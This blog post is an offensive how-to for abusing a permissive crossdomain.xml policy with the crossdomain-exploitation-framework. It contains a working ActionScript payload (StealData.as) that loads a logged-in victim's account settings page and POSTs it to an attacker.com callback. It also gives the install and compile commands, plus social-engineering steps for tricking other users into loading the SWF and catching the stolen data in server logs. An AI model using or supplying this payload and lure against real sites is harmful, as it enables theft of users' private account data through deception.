Star InactiveStar InactiveStar InactiveStar InactiveStar Inactive
 

It is a story from the past, but I decided to create short how-to exploit it with crossdomain-exploitation-framework

One time I found permissive crossdomain.xml file.

 If site contains sensitive information, for example people are logged in their accounts, which has sensitive data, we can steal this information, of course with social engineering or posting something on our wall and ask other people to review your post.

It was main idea how to attack end users, now a short technical how to do it.

 

These steps are written below with some comments:

1) Download

git clone https://github.com/sethsec/crossdomain-exploitation-framework.git

2)Run to check installation and dependencies

./SWF-server

**************************************************
*                                                *
*              Welcome to SWF Server!            *
*                                                *
**************************************************

It looks like this is the first run.  We need to set up a few things first.

[INSTALL] Creating /opt/flex...
[INSTALL] Downloading Flex (This is a 340MB file)...
[INSTALL] Downloading: http://download.macromedia.com/pub/flex/sdk/flex_sdk_4.6.zip Bytes: 343973963
[INSTALL] Extracting Flex to /opt/flex (Takes 5-20 seconds)
[INSTALL] Creating a self-signed SSL cert...
[INSTALL] Key and Cert saved in /opt/crossdomain-exploitation-framework/server.pem
[INSTALL] Copying http-crossdomain.nse to nmap scripts directory...
cp: cannot create regular file '/usr/share/nmap/scripts/http-crossdomain.nse': Permission denied
[INSTALL] Installation complete. Compile SWF and then start SWF-server again

     To create your own SWF file:

     1) Chose a template from ./actionscript-templates
     2) Edit the template (or copy and then edit the template)
         a) Specify a page on the vulnerable site that you want your victimn to access:
              Ex: http://vulnerable.com/account/settings
         b) For data stealing SWFs, specify your attacker callback URL:
              Ex: http://attacker/, https://192.168.0.100, or https://www.attacker.com/
         c) For CSRF SWFs, modify the actionscript to extract the information you need
     3) Compile the ActionScript file and drop the SWF to the ./webroot directory (exploit.swf)
         a) /opt/flex/bin/mxmlc ./actionscript-templates/<template>.as --output ./webroot/exploit.swf

     4) Re-run ./SWF-server

3) Lets use a link from our account settings and put it within StealData.as with putting the link to our controlled attacker site.

// Author: Gursev Singh Kalra (This email address is being protected from spambots. You need JavaScript enabled to view it.)
// Very slightly modified by Seth Art (This email address is being protected from spambots. You need JavaScript enabled to view it.)
// StealData.as

package {
        import flash.display.Sprite;
        import flash.events.*;
        import flash.net.URLRequestMethod;
        import flash.net.URLRequest;
        import flash.net.URLLoader;

        public class StealData extends Sprite {
                public function StealData() {
                        // Target URL from where the data is to be retrieved
                        var readFrom:String = "http://victim.com/account/menu.php?action=settings";
                        var readRequest:URLRequest = new URLRequest(readFrom);
                        var getLoader:URLLoader = new URLLoader();
                        getLoader.addEventListener(Event.COMPLETE, eventHandler);
                        try {
                                getLoader.load(readRequest);
                        } catch (error:Error) {
                                trace("Error loading URL: " + error);
                        }
                }

                private function eventHandler(event:Event):void {
                        // URL to which retrieved data is to be sent
                        var sendTo:String = "http://attacker.com/new_article.php"
                        var sendRequest:URLRequest = new URLRequest(sendTo);
                        sendRequest.method = URLRequestMethod.POST;
                        var body:String = escape(event.target.data);
                        sendRequest.data = body;
                        var sendLoader:URLLoader = new URLLoader();
                        try {
                                sendLoader.load(sendRequest);
                        } catch (error:Error) {
                                trace("Error loading URL: " + error);
                        }
                }
        }
}

4) Lets compile it

/opt/flex/bin/mxmlc ./actionscript-templates/StealData.as --output ./poc.swf
Loading configuration file /opt/flex/frameworks/flex-config.xml
/opt/crossdomain-exploitation-framework/actionscript-templates/StealData.as: Warning: This compilation unit did not have a factoryClass specified in Frame metadata to load the configured runtime shared libraries option.

/opt/crossdomain-exploitation-framework/poc.swf (1100 bytes)

5) Now put poc.swf to your web server and insert in your page code call to poc.swf

6) Use your imagination and provide link to other users of victim.com site, use wall, social engineering or send private messages with text "I Kindly ask you to read my short article about whatever"..

7) Wait...enable full web server logging or use tcpdump, it is also up to you.

 

Thats all, cheers

Add comment


Security code
Refresh